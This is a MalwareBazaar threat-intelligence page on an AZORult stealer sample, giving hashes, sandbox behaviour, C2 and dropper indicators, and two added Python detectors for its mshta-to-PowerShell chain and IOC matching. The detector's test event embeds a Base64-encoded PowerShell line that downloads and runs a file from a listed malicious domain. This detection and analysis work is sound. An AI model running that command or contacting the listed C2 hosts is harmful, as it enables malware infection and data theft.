MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



AZORult


Vendor detections: 14



SHA256 hash: c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53
SHA3-384 hash: b2901d495599f71f43c9038f68314b9429832596c835055406697263c5730160f5bfc91f8b132fa2f5cab4fb6cddf0d9
SHA1 hash: a0ccae106a243ad2b1d748512c3e6783b2dd2547
MD5 hash: f88740451956d87424b84326e9e9dde7
humanhash: two-oranges-dakota-six
File name: C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe
Signature: AZORult
File size: 105'984 bytes
First seen: 2021-11-24 07:55:32 UTC
Last seen: Never
File type: Executable exe
MIME type: application/x-dosexec
imphash: 06ac1f21ee2a357ffb0dd7db52cbbb13 (1 x WSHRAT, 1 x AZORult, 1 x Conti)
ssdeep: 1536:IuW0xpn7JWWkH7Jx1Q3jh1GTuGi1GfT4i1GtszSGkckZptXUG8IUcGHPGq9OR:G0TIVAncytktIJGHi
Threatray: 7'528 similar samples on MalwareBazaar
TLSH: T161A35D4F6E201159C4363FF95A7A1065DAB480178F480C57F35C7A299F6EBE9CE202AF
dhash icon: 01e6e6e6dcd81823 (2 x AZORult, 1 x RaccoonStealer, 1 x Worm.Ramnit)
Reporter: abuse_ch
Tags: AZORult exe


abuse_ch
AZORult C2:
http://91.219.236.69/

Indicators Of Compromise (IOCs)


Below is a list of indicators of compromise (IOCs) associated with this malware sample.

IOC                     ThreatFox reference
http://91.219.236.69/   https://threatfox.abuse.ch/ioc/253491/

Intelligence


File Origin
# of uploads:
1
# of downloads:
337
Origin country:
n/a
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe
Verdict:
Malicious activity
Analysis date:
2021-11-24 07:56:49 UTC
Tags:
loader trojan stealer vidar rat azorult

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Result
Verdict:
Malware
Behaviour
Creating a file in the %temp% subdirectories
Creating synchronization primitives
Running batch commands
Creating a process with a hidden window
Launching a process
Creating a window
Creating a process from a recently created file
Creating a file
Searching for the window
DNS request
Sending an HTTP GET request
Searching for synchronization primitives
Connecting to a non-recommended domain
Query of malicious DNS domain
Launching a file downloaded from the Internet
Sending an HTTP GET request to an infection source
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
80%
Tags:
packed packed patcher
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Result
Threat name:
Azorult
Detection:
malicious
Classification:
troj.spyw.evad
Score:
100 / 100
Signature
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Creates HTA files
Detected unpacking (overwrites its own PE header)
Drops PE files to the user root directory
Found malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Encoded FromBase64String
Sigma detected: Execution from Suspicious Folder
Sigma detected: FromBase64String Command Line
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Suspicious PowerShell Command Line
Sigma detected: Suspicious Script Execution From Temp Folder
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Suspicious powershell command line found
Yara detected Azorult
Yara detected Azorult Info Stealer
Yara detected BatToExe compiled binary
Yara detected Generic Patcher
Behaviour
Behavior Graph:
Behavior Graph ID: 527679; Sample: C594188774A2D72B774ACA96EB0...; Startdate: 24/11/2021; Architecture: WINDOWS; Score: 100

The graph's node and edge labels, rebuilt as a process tree (paths abbreviated with "..." as on the original graph):

Sample-level DNS: colonna.ug, colonna.ac.ug
Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 21 other signatures

- C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe (started)
  dropped: C:\Users\user\AppData\Local\...\Patch-nb9.exe (PE32); C:\Users\user\AppData\Local\...\start.bat (DOS); C:\Users\user\AppData\Local\...\89465456.hta (HTML); 2 other malicious files
  signatures: Detected unpacking (overwrites its own PE header); Creates HTA files
  - cmd.exe (started)
    - mshta.exe (started)
      signature: Suspicious powershell command line found
      - powershell.exe (started)
        network: opesjk.ug 194.87.46.42 port 80 (client port 49718), ASBAXETNRU, Russian Federation
        dropped: C:\Users\Public\sjw.exe (PE32)
        - sjw.exe (started)
          dropped: C:\Users\user\AppData\Local\...\fsacvbe.exe (PE32); C:\Users\user\AppData\Local\...\cbvdsme.exe (PE32)
          signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
          - cbvdsme.exe (started)
            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
          - fsacvbe.exe (started)
        - conhost.exe (started)
    - mshta.exe (started)
      - powershell.exe (started)
        network: partaususd.ru 109.196.164.102 port 80 (client port 49722), MTW-ASRU, Russian Federation; bit.do 54.83.52.76 port 80 (client ports 49721, 49723), AMAZON-AESUS, United States
        dropped: C:\Users\Public\urn.exe (PE32)
        - urn.exe (started)
        - conhost.exe (started)
    - mshta.exe (started)
      - powershell.exe (started)
        network: marksidfg.ug
        signatures: Drops PE files to the user root directory; Powershell drops PE file
        - conhost.exe (started)
    - 2 other processes (started)
      dropped: C:\Users\user\AppData\...\dup2patcher.dll (PE32)
      signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
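The sandbox tree above is a textbook sample.exe > cmd.exe > mshta.exe > powershell.exe > dropped PE chain, and the Sigma hits listed in the signature block (MSHTA Spawning Windows Shell, FromBase64String Command Line, Execution from Suspicious Folder, Suspicious Script Execution From Temp Folder, Change PowerShell Policies) are exactly the rules that fire on it. The following is an added example, not sandbox output or MalwareBazaar code, of that detection logic run over constructed process-creation events modelled on the tree: PIDs, the command lines, the script names under Temp and the Base64 payload are invented for illustration, and the rule patterns are our own approximations of the named Sigma rules, not the rules' actual YAML.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon Event ID 1 style), reduced to the fields used here."""
    pid: int
    ppid: int
    image: str     # full path of the new process
    cmdline: str


# --- Constructed sample events (not sandbox output), modelled on the process tree on this page.
# PIDs, the .bat/.hta names in Temp, the command lines and the Base64 payload are invented.
_PAYLOAD = b"IEX (New-Object Net.WebClient).DownloadString('http://opesjk.ug/sjw.exe')"
_ENCODED = base64.b64encode(_PAYLOAD).decode()

SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(1000, 900, r"C:\Users\user\Desktop\C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe",
              "C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe"),
    ProcEvent(1010, 1000, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\user\AppData\Local\Temp\start.bat"'),
    ProcEvent(1020, 1010, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\user\AppData\Local\Temp\89465456.hta"),
    ProcEvent(1030, 1020, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "
              "\"IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
              + _ENCODED + "')))\""),
    ProcEvent(1040, 1030, r"C:\Users\Public\sjw.exe", r"C:\Users\Public\sjw.exe"),
    # Benign control: an interactive PowerShell session started from explorer.exe.
    ProcEvent(2000, 500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Service"),
]

# --- Rule patterns (our approximations of the Sigma rules named on this page).
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\temp\\", "\\appdata\\roaming\\")
B64_ARG_RE = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]{20,})'", re.IGNORECASE)
POLICY_RE = re.compile(r"(?:-e\w*\s+|set-executionpolicy\s+)(?:bypass|unrestricted)", re.IGNORECASE)
SCRIPT_IN_TEMP_RE = re.compile(r"\\appdata\\local\\temp\\[^\s\"']*\.(?:bat|cmd|hta|ps1|vbs|js)\b",
                               re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> str:
    """Walk ppid links back to the root we know about; the seen-set guards against pid-reuse cycles."""
    chain, seen, cur = [], set(), ev
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return " > ".join(reversed(chain))


def decode_b64_urls(cmdline: str) -> List[str]:
    """Extract URLs from a FromBase64String literal (ASCII payload; -EncodedCommand would be UTF-16LE)."""
    urls: List[str] = []
    for blob in B64_ARG_RE.findall(cmdline):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:       # binascii.Error is a ValueError subclass
            continue
        urls.extend(URL_RE.findall(text))
    return urls


def evaluate(events: List[ProcEvent]) -> Dict[int, dict]:
    """Return {pid: {"chain", "image", "hits"}} for every event that trips at least one rule."""
    by_pid = {e.pid: e for e in events}
    findings: Dict[int, dict] = {}
    for e in events:
        hits: List[str] = []
        parent = by_pid.get(e.ppid)
        if parent and basename(parent.image) == "mshta.exe" and basename(e.image) in SHELLS:
            hits.append("mshta_spawns_shell")
        if "frombase64string" in e.cmdline.lower():
            hits.append("frombase64string_cmdline")
        if POLICY_RE.search(e.cmdline):
            hits.append("executionpolicy_bypass")
        if SCRIPT_IN_TEMP_RE.search(e.cmdline):
            hits.append("script_from_temp_folder")
        if any(d in e.image.lower() for d in SUSPICIOUS_DIRS):
            hits.append("execution_from_suspicious_folder")
        hits.extend(f"embedded_url:{u}" for u in decode_b64_urls(e.cmdline))
        if hits:
            findings[e.pid] = {"chain": ancestry(e, by_pid), "image": e.image, "hits": hits}
    return findings


if __name__ == "__main__":
    for pid, f in evaluate(SAMPLE_EVENTS).items():
        print(pid, f["chain"], f["hits"])
```

The benign control event (PowerShell launched from explorer.exe with no encoded payload) produces no finding, which is the point of keying the first rule on the parent image rather than on powershell.exe alone. Decoding the FromBase64String argument on the fly is what turns a behavioural alert into a network indicator you can pivot on.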
Threat name:
Win32.Trojan.Generic
Status:
Suspicious
First seen:
2019-08-15 01:23:42 UTC
File Type:
PE (Exe)
Extracted files:
10
AV detection:
28 of 45 (62.22%)
Threat level:
  5/5
Result
Malware family:
raccoon
Score:
  10/10
Tags:
family:azorult family:oski family:raccoon botnet:7632dffeb03da57edca98c8bfb2611868e8eb0a7 discovery infostealer spyware stealer trojan upx
Behaviour
Checks processor information in registry
Kills process with taskkill
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Suspicious use of SetThreadContext
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
UPX packed file
ACProtect 1.3x - 1.4x DLL software
Azorult
Oski
Raccoon
Malware Config
C2 Extraction:
http://195.245.112.115/index.php
colonna.ac.ug
Dropper Extraction:
http://bit.do/e33Br
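The IOC section at the top of the page, the sandbox network nodes and the extracted config give three kinds of indicator: bare IPs (194.87.46.42, 109.196.164.102), domains (colonna.ac.ug, opesjk.ug, partaususd.ru, marksidfg.ug) and URLs (http://91.219.236.69/, http://195.245.112.115/index.php, the bit.do dropper link). They should not all be matched the same way: bit.do is a public shortener and 54.83.52.76 is Amazon space, so only the exact path /e33Br is an indicator, and a domain IOC must match on suffix, not substring. The following is an added example, not MalwareBazaar or ThreatFox code, that types each indicator and runs the matching over constructed DNS and proxy log lines (the log format, hostnames and timestamps are invented; the indicators are the ones on this page).

```python
import ipaddress
import re
from typing import List, NamedTuple, Tuple
from urllib.parse import urlsplit


class IOC(NamedTuple):
    kind: str   # "ip", "domain" or "url"
    host: str
    path: str   # only used for kind == "url"; "/" means "any request to this host"
    raw: str    # indicator as written on the page, for reporting


# Indicators taken from this page: abuse_ch's C2 comment, the ThreatFox IOC, the sandbox
# network nodes and the extracted malware config. bit.do and its AWS address are deliberately
# NOT listed as host indicators; only the exact shortener path is the dropper URL.
PAGE_IOCS = [
    "http://91.219.236.69/", "http://195.245.112.115/index.php",
    "colonna.ac.ug", "colonna.ug", "opesjk.ug", "194.87.46.42",
    "partaususd.ru", "109.196.164.102", "marksidfg.ug",
    "http://bit.do/e33Br",
]

# Constructed DNS and proxy log lines (not sandbox output); hosts and timestamps are invented.
DNS_LOG = [
    "2021-11-24T07:58:01Z host1 query A colonna.ac.ug",
    "2021-11-24T07:58:02Z host1 query A opesjk.ug",
    "2021-11-24T07:58:03Z host2 query A cdn.partaususd.ru",   # subdomain of an IOC
    "2021-11-24T07:58:04Z host3 query A notcolonna.ug",        # lookalike, must not match
    "2021-11-24T07:58:05Z host2 query A bit.do",               # shortener itself is not an IOC
    "2021-11-24T07:58:06Z host3 query A www.example.com",
]
PROXY_LOG = [
    "2021-11-24T07:58:07Z host1 GET http://91.219.236.69/ 200",
    "2021-11-24T07:58:08Z host1 GET http://195.245.112.115/index.php 200",
    "2021-11-24T07:58:09Z host2 GET http://bit.do/e33Br 301",
    "2021-11-24T07:58:10Z host2 GET http://bit.do/somethingelse 301",
    "2021-11-24T07:58:11Z host1 GET http://109.196.164.102/urn.exe 200",
]

DNS_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) query (?P<rtype>\S+) (?P<qname>\S+)$")
PROXY_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def refang(s: str) -> str:
    """Undo common defanging so indicators pasted from reports parse."""
    return s.replace("hxxp", "http").replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def parse_ioc(raw: str) -> IOC:
    s = refang(raw.strip())
    if "://" in s:
        u = urlsplit(s)
        return IOC("url", (u.hostname or "").lower(), u.path or "/", raw)
    try:
        ipaddress.ip_address(s)
        return IOC("ip", s, "", raw)
    except ValueError:
        return IOC("domain", s.lower().rstrip("."), "", raw)


def host_matches(ioc: IOC, host: str) -> bool:
    host = host.lower().rstrip(".")
    if ioc.kind == "ip":
        return host == ioc.host
    # exact or subdomain match only; a plain substring test would flag notcolonna.ug
    return host == ioc.host or host.endswith("." + ioc.host)


def scan(dns_lines: List[str], proxy_lines: List[str], iocs: List[str]) -> List[Tuple[str, str, str]]:
    """Return (source host, observed name/URL, matching indicator) for every hit."""
    parsed = [parse_ioc(i) for i in iocs]
    hits: List[Tuple[str, str, str]] = []
    for line in dns_lines:
        m = DNS_RE.match(line)
        if not m:
            continue
        for ioc in parsed:
            host_level = ioc.kind == "domain" or (ioc.kind == "url" and ioc.path == "/")
            if host_level and host_matches(ioc, m["qname"]):
                hits.append((m["src"], m["qname"], ioc.raw))
    for line in proxy_lines:
        m = PROXY_RE.match(line)
        if not m:
            continue
        u = urlsplit(m["url"])
        host, path = (u.hostname or ""), (u.path or "/")
        for ioc in parsed:
            if ioc.kind == "url":
                # path "/" on the IOC means any request to that host; otherwise exact path prefix
                if host_matches(ioc, host) and path.startswith(ioc.path):
                    hits.append((m["src"], m["url"], ioc.raw))
            elif host_matches(ioc, host):
                hits.append((m["src"], m["url"], ioc.raw))
    return hits


def hosts_to_triage(hits: List[Tuple[str, str, str]]) -> List[str]:
    return sorted({src for src, _, _ in hits})


if __name__ == "__main__":
    for src, seen, ioc in scan(DNS_LOG, PROXY_LOG, PAGE_IOCS):
        print(f"{src}: {seen} matched {ioc}")
```

Only host1 and host2 come out for triage: host2 hit the exact dropper path on bit.do, while its other bit.do request and the bare bit.do lookup are ignored, and host3's notcolonna.ug lookup does not match colonna.ug because the domain check requires a dot boundary.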
Unpacked files
SHA256 hash:
39281bf3f40ccecd50166275ff6e1e93759ed5c02ac95793720be0db8436be5c
MD5 hash:
57c9232cb9711251080f39cd34e4f989
SHA1 hash:
a35f74a25a20c595dd8e5316e02f94ba57e99a51
SHA256 hash:
b83c29856aa552c04f07591b1b6e2f2fc95ed0467fe791b735883c100069d744
MD5 hash:
d3b19e5d1fb169dae0414d6b82430e02
SHA1 hash:
e8a11009d1e36669dffc635a3d573163bac48108
SHA256 hash:
c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53
MD5 hash:
f88740451956d87424b84326e9e9dde7
SHA1 hash:
a0ccae106a243ad2b1d748512c3e6783b2dd2547
Detections:
win_batchwiper_auto
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: CN_Honker_Acunetix_Web_Vulnerability_Scanner_8_x_Enterprise_Edition_KeyGen
Author: Florian Roth
Description: Sample from CN Honker Pentest Toolset - file Acunetix_Web_Vulnerability_Scanner_8.x_Enterprise_Edition_KeyGen.exe
Reference: Disclosed CN Honker Pentest Toolset

Rule name: Generic_KeyGen_Patcher_RID2F96
Author: Florian Roth
Description: Keygen from CN Honker Pentest Toolset - file Acunetix_Web_Vulnerability_Scanner_8.x_Enterprise_Edition_KeyGen.exe
Reference: Disclosed CN Honker Pentest Toolset

Rule name: win_batchwiper_auto
Author: Felix Bilstein - yara-signator at cocacoding dot com
Description: Detects win.batchwiper.

File information



Comments